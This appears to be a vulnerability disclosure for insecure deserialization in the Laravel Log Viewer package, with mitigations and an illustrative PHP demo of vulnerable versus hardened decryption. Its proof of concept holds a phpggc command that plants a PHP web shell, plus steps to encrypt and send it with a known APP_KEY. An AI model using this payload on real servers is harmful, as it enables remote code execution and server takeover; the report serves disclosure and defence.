📛 Insecure Deserialization in Laravel Log Viewer leading to RCE
Summary
An insecure deserialization vulnerability exists in the Laravel Log Viewer package at the GET /logs endpoint, via the dl and l parameters. These parameters are expected to carry values encrypted with the application's APP_KEY; the handler decrypts them with Laravel's decrypt() helper, which unserializes the plaintext by default, so the decrypted bytes reach unserialize() without any validation or type check.
If an attacker knows the APP_KEY, they can also compute the MAC Laravel checks before decrypting, so they can craft a valid ciphertext containing a deserialization gadget chain and achieve Remote Code Execution (RCE) on the server.
🔥 Impact
- Remote Code Execution (RCE): A successful exploit allows an attacker to execute arbitrary PHP code on the server.
- Full Server Compromise: The attacker may be able to read/write arbitrary files, access sensitive data (e.g., database credentials), and gain complete control over the server.
🧪 Exploitation Details
- Endpoint: GET /logs
- Vulnerable parameters: dl, l
- Requirements:
  - The attacker must know the APP_KEY of the Laravel application.
  - No authentication is required; the endpoint can be exploited by unauthenticated attackers.
🛠️ Proof of Concept (PoC)
Using phpggc, an attacker can generate a serialized Laravel gadget chain that, when unserialized, writes a web shell into the public directory:
./phpggc Laravel/RCE19 "echo '<?php system(\$_GET[\"vcstest88353534\"])?>' > /var/www/html/public/vcstest_928747242.php" | base64 -w 0
The attacker then encrypts this payload with the known APP_KEY using https://github.com/synacktiv/laravel-crypto-killer and sends the result to the server in the dl or l parameter; decryption followed by unserialize() runs the chain and the code executes.
💡 Suggested Mitigation
- Avoid deserializing user-supplied input, even when it is encrypted: a valid MAC only proves the value was produced with the APP_KEY, not that it is safe to unserialize.
- For these parameters the value is only a log file name, so decrypt it with unserialization disabled (decrypt($value, false) in Laravel) and accept it only if it matches a file the application actually serves from the log directory.
- Where objects genuinely must be deserialized, enforce a strict allow-list of expected classes (for example the allowed_classes option of unserialize()) before any object is instantiated.
- Prefer safer data formats such as JSON for user-controlled input instead of PHP serialization.
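As an added illustration (this is not code from the Laravel Log Viewer package or from the reporter), the following stand-alone PHP 8 script mirrors the wire format of Laravel's Illuminate\Encryption\Encrypter for AES-256-CBC so the two halves of the bug can be seen side by side: with the APP_KEY an attacker can produce a valid MAC for any serialized blob, and decrypting with unserialization on (Laravel's default) hands that blob to unserialize(). The hardened resolver shows the mitigation from the list above. The APP_KEY, file names and log directory are made up for the demo, and a harmless stdClass stands in for a real phpggc chain.

```php
<?php
// Added example: re-implements Laravel's encrypt()/decrypt() format with plain openssl
// so it runs outside a Laravel app. Key, file names and directory below are constructed.

function laravelKey(string $appKey): string {
    // A real APP_KEY in .env is usually "base64:..."; strip the prefix and decode it.
    return str_starts_with($appKey, 'base64:') ? base64_decode(substr($appKey, 7)) : $appKey;
}

// Laravel layout: base64(json({iv, value, mac, tag})), MAC = HMAC-SHA256(base64(iv) . value).
function laravelEncrypt(string $plaintext, string $key): string {
    $iv    = random_bytes(16);
    $value = openssl_encrypt($plaintext, 'aes-256-cbc', $key, 0, $iv); // base64 output
    $iv64  = base64_encode($iv);
    $mac   = hash_hmac('sha256', $iv64 . $value, $key);
    return base64_encode(json_encode(['iv' => $iv64, 'value' => $value, 'mac' => $mac, 'tag' => '']));
}

// Equivalent of Crypt::decrypt($payload, $unserialize): MAC check, AES-CBC, then optional unserialize().
function laravelDecrypt(string $payload, string $key, bool $unserialize = true): mixed {
    $p = json_decode(base64_decode($payload, true), true);
    if (!is_array($p) || !isset($p['iv'], $p['value'], $p['mac'])) {
        throw new RuntimeException('The payload is invalid.');
    }
    $expected = hash_hmac('sha256', $p['iv'] . $p['value'], $key);
    if (!hash_equals($expected, $p['mac'])) {
        throw new RuntimeException('The MAC is invalid.');
    }
    $plain = openssl_decrypt($p['value'], 'aes-256-cbc', $key, 0, base64_decode($p['iv']));
    if ($plain === false) {
        throw new RuntimeException('Could not decrypt the data.');
    }
    return $unserialize ? unserialize($plain) : $plain; // unserialize() is the dangerous sink
}

// VULNERABLE shape: unserialization on, and whatever comes out is trusted as a file name.
function vulnerableResolveLog(string $l, string $key, string $logDir): string {
    $file = laravelDecrypt($l, $key);   // attacker controls the serialized bytes
    return $logDir . '/' . $file;       // any gadget chain already ran inside unserialize()
}

// HARDENED shape: no unserialization, and the name must be one the app actually serves.
function hardenedResolveLog(string $l, string $key, array $allowedFiles, string $logDir): string {
    $file = laravelDecrypt($l, $key, false); // plain string out, nothing instantiated
    if (!is_string($file) || basename($file) !== $file || !in_array($file, $allowedFiles, true)) {
        throw new InvalidArgumentException('Unknown log file.');
    }
    return $logDir . '/' . $file;
}

// --- demo with constructed values ---
$key     = laravelKey('base64:' . base64_encode(str_repeat("\x42", 32))); // made-up 32-byte key
$allowed = ['laravel.log', 'laravel-2024-01-01.log'];

// Legitimate link: the app encrypts the name with serialization on, so the wire value
// is the serialized string s:11:"laravel.log";
$good = laravelEncrypt(serialize('laravel.log'), $key);
echo vulnerableResolveLog($good, $key, '/var/log/app'), PHP_EOL;

// Attacker link: with the APP_KEY any serialized blob gets a valid MAC. unserialize()
// instantiates the attacker-chosen class; a phpggc chain goes in this same slot.
$evil = laravelEncrypt('O:8:"stdClass":1:{s:4:"file";s:11:"laravel.log";}', $key);
var_dump(laravelDecrypt($evil, $key)); // object(stdClass): attacker-controlled object came back

// The hardened resolver never unserializes and rejects the raw serialized text as a name.
try {
    hardenedResolveLog($evil, $key, $allowed, '/var/log/app');
} catch (InvalidArgumentException $e) {
    echo 'hardened: ', $e->getMessage(), PHP_EOL;
}
// Producer side must match: encrypt the bare name with serialization off (encrypt($name, false)).
echo hardenedResolveLog(laravelEncrypt('laravel.log', $key), $key, $allowed, '/var/log/app'), PHP_EOL;
```

In a Laravel app the two resolvers collapse to decrypt($request->input('l')) versus decrypt($request->input('l'), false) plus the allow-list check; the link generator has to switch to encrypt($name, false) at the same time, otherwise the legitimate links stop matching.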
If you prefer to receive more detailed information through a private channel, please let me know.